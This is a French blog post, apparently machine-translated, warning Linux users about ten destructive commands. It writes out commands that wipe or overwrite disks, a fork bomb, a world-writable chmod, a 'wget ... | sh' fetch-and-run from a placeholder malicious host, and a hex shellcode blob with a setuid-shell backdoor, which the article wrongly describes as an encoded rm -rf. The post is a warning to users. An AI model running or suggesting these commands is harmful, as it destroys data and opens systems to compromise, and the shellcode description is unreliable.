10 commandes Linux destructrices que vous ne devriez jamais exécuter


  • Français


  • Quelles sont les commandes Linux les plus dangereuses ?

    On m’a posé cette question à de nombreuses reprises et j’ai évité d’y répondre parce que il n’y a pas de liste précise de commandes Linux dangereuses.

    Vous disposez des outils qui vous permettent de contrôler et de modifier chaque aspect de votre système d’exploitation. Je n’essaie pas de vous effrayer, mais si vous n’êtes pas familier avec les commandes et les outils, vous pouvez bousiller votre système assez facilement.

    Imaginez le scénario d’un jeune enfant dans un ménage. Il existe de nombreuses façons dont l’enfant peut se blesser. Mais cela signifie-t-il que l’enfant ne devrait pas être autorisé à sortir du berceau ? Ce serait préjudiciable à sa croissance.

    C’est là que les parents établissent des limites et guident l’enfant. Ne vous approchez pas du feu. Ne mettez pas vos doigts dans les prises de courant. Au fur et à mesure que l’enfant grandit et acquiert de l’expérience, il peut allumer le poêle, faire un feu dans la cheminée et brancher les câbles d’alimentation.

    De même, si vous êtes au courant de quelques commandes risquées connues, vous pouvez éviter de tomber dans les pièges des trolls qui essaient de vous inciter à exécuter des commandes et de gâcher votre système.

    Au fur et à mesure que vous acquerrez de l’expérience et que vous connaîtrez la signification et l’utilisation des commandes et des outils, vous réduirez les risques de détruire votre système avec des commandes stupides et délicates.

    Mon coéquipier Sreenath a rassemblé certaines des commandes Linux dangereuses les plus populaires. Voyons comment ils fonctionnent.

    1. rm -rf /*

    Celui-ci est probablement la commande la plus infâme circulant dans toutes sortes de médias sociaux. Vous trouverez souvent des trolls commentant cela dans diverses discussions.

    La commande rm est utilisé pour supprimer des fichiers/répertoires. Les drapeaux -r et -f sont utilisés pour indiquer la suppression récursive de tous les fichiers dans le répertoire spécifié. Maintenant, sans privilège root, cette commande ne fera aucun mal.

    L’exécution de la commande sudo rm -rf / ne créera pas non plus de problèmes car la plupart des distributions fournissent une option de sécurité. Vous devez spécifier –no-preserve-root avec pour l’exécuter réellement.

    sudo rm -rf / --no-preserve-root

    Cependant, une version plus simple de ceci pourrait être :

    sudo rm -rf /*

    Il commencera à supprimer tous les fichiers de manière récursive dans le répertoire racine, et à un moment donné, votre système se fige avec un message “Erreur lors de la suppression du fichier”. Une fois redémarré, vous serez redirigé vers le grub-sauvetage rapide.

    2. Overwrite your partition

    If you are familiar with file systems, you probably know what /dev/sda is. It is (usually) your disk drive partition. The > operator is used to write the output of its preceding command to the specified location provided.

    Once you run any command and write it to /dev/sda, say:

    echo "Hello" > /dev/sda

    Cela remplacera votre partition contenant toutes les données nécessaires pour démarrer le système avec la chaîne “Hello”.

    3. Déplacez tout dans le vide

    Il y a un vide à l’intérieur de chaque système Linux. Et ce vide est /dev/null.

    Tout ce que vous jetez dans cette zone est perdu à jamais. En outre, il signale le processus d’écriture comme un succès après la suppression des données, ce qui est la principale raison de sa destructivité.

    mv /home/user/* /dev/null

    La commande mv est utilisé pour déplacer ou renommer des fichiers/répertoires. Dans la commande ci-dessus, vous déplacez tous les fichiers du répertoire personnel vers le void. Tant que le système racine n’est pas détruit, toutes vos données personnelles seront perdues.

    4. Formatez votre disque dur

    mkfs est un utilitaire de ligne de commande, utilisé pour formater les disques et les partitions. C’est un outil super pratique pour créer des partitions pour diverses installations. Mais la même commande peut également formater votre disque. Formater votre disque signifie supprimer tous les fichiers nécessaires au démarrage du système.

    mkfs.ext3 /dev/sda

    La commande fait son travail et vous vous retrouvez avec un système foiré au-delà de la récupération.

    5. Fourche bombe

    Cette jolie combinaison aléatoire de caractères spéciaux et de symboles est suffisamment puissante pour geler un système en cours d’exécution en épuisant les ressources système.

    :(){:|:&};:

    & – Opérateur d’arrière-plan Shell. Il informe le shell de mettre la commande en arrière-plan. Ici, il définit une fonction appelée ‘:’, qui s’appelle deux fois, une fois au premier plan et une fois en arrière-plan. Ce processus continue de s’exécuter encore et encore jusqu’à ce que le système se fige.

    Comme son nom l’indique, il se bifurque et finit par devenir une bombe à chaîne et consomme toutes les ressources du système. Vous serez obligé de redémarrer le système, ce qui n’est pas aussi grave que les autres commandes de cette liste.

    6. Écraser les fichiers de configuration importants

    Bien que ce ne soit pas une commande en soi, il s’agit plutôt d’une mesure de précaution.

    Comme mentionné ci-dessus, l’opérateur “>” est utilisé pour écrire dans un fichier. Il supprime simplement tout ce qui est déjà présent dans le fichier et écrit les nouvelles données qui lui sont fournies.

    command > config_filename

    Maintenant, si vous utilisez un fichier de configuration important comme emplacement pour écrire des données, il remplacera le contenu, laissant un système en panne.

    7. Remplacer la partition par des données inutiles

    Le /dev/random est une commande sous Linux qui peut créer des données inutiles. Combinez-le avec le commande jj et votre partition, et vous obtenez un Molotov pour mettre le feu à votre partition.

    dd if=/dev/random of=/dev/sda

    La commande dd est utilisée comme outil de copie de bas niveau. Ici, il prend des données aléatoires de /dev/random et remplace la partition /dev/sda avec ces déchets.

    Un effet similaire est obtenu avec :

    cat /dev/urandom > filename

    Ici, il prend les données inutiles de /dev/urandom et remplit un fichier. S’il n’est pas terminé avec Ctrl + C, le fichier peut occuper une quantité considérable d’espace, ce qui peut être désastreux pour les systèmes bas de gamme.

    8. Exposez votre système à tout le monde

    Tout est un fichier sous Linux et chaque le fichier a certaines autorisations.

    Vous pouvez afficher les autorisations avec ls -l. Le système de fichiers racine n’est pas accessible aux autres utilisateurs sans privilèges. Bien que cela garantisse un système privé et sécurisé, vous pouvez renverser ce système avec une seule commande.

    chmod -R 777/

    La commande ci-dessus expose tous les fichiers de la partition racine à tout le monde. Cela signifie que tous ceux qui utilisent le système disposent d’autorisations de lecture, d’écriture et d’exécution. Ce n’est pas bon pour votre système.

    9. Téléchargez et exécutez du contenu malveillant

    Comment installer un logiciel sous Linux ? Vous utilisez le gestionnaire de paquets officiel ou des paquets prêts à l’emploi comme Deb/RPM, Snap. Flatpack etc.

    Cependant, certains logiciels ne sont pas emballés et leurs développeurs fournissent des scripts shell à télécharger et à exécuter. Prenez l’homebrew par exemple.

    Vous téléchargez un fichier shell et l’exécutez en tant que root pour installer un logiciel sur votre système. Voyez-vous le problème avec cela?

    Bien qu’il fonctionne avec des logiciels officiels comme Homebrew, vous devez vérifier le contenu du script shell que vous téléchargez avant de l’exécuter directement comme ceci :

    wget http://malicious_source -O- | sh

    De telles commandes téléchargeront et exécuteront des scripts malveillants dans votre système, ce qui peut compromettre la sécurité de votre système.

    10. Commandes déguisées

    Il existe de nombreuses façons d’exécuter des commandes dans un terminal Linux. L’un de ces moyens est les commandes codées en hexadécimal.

    char esp[] __attribute__ ((section(“.text”))) /* e.s.p
    release */
    = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
    “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
    “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
    “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
    “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
    “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
    “\x6e\x2f\x73\x68\x00\x2d\x63\x00”
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

    Bien que cela ait l’air fantaisiste, il s’agit d’une version codée de rm -rf commande. Cela fait le même effet que l’exécution de la commande précédente. Donc, tout en copiant et collant de telles commandes fantaisistes à partir d’Internet, soyez prudent.

    Emballer

    pebkac

    Il existe un terme informatique célèbre PEBKAC ; “un problème existe entre le clavier et la chaise.”

    Parce qu’en fin de compte, c’est à l’utilisateur (vous) de s’assurer que vous ne détruisez pas le système en exécutant aveuglément une commande dangereuse.

    Ce n’est pas le travail d’UNIX de vous empêcher de tirer sur votre pied. Si vous choisissez de le faire, alors c’est le travail d’UNIX de livrer Mr. Bullet à Mr Foot de la manière la plus efficace qu’il connaisse.

    Et cette ligne s’applique également à Linux. Vous obtenez un contrôle total sur votre système d’exploitation. Ce que vous choisissez de faire dépend entièrement de vous.

    Je conseille ces choses pour assurer une expérience plus sûre:

    • Essayez de comprendre les commandes que vous êtes sur le point d’exécuter.
    • Gardez une sauvegarde de vos paramètres système avec Timeshift
    • Conservez une sauvegarde des données personnelles (répertoire personnel) à l’aide de DejaDup

    Comme je l’ai dit, il n’y a pas de liste fixe de commandes Linux dangereuses. Beaucoup plus peuvent être ajoutés à cette liste et il n’y a tout simplement pas de fin.

    J’espère que cela vous donne quelques indices sur ce que vous ne devriez pas faire pour rester en sécurité avec Linux. Faites-moi savoir si vous avez des suggestions dans la section des commentaires.


    Source

    Houssen Moshinaly

    Pour contacter personnellement le taulier :

    Laisser un commentaire

    Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

    Copy code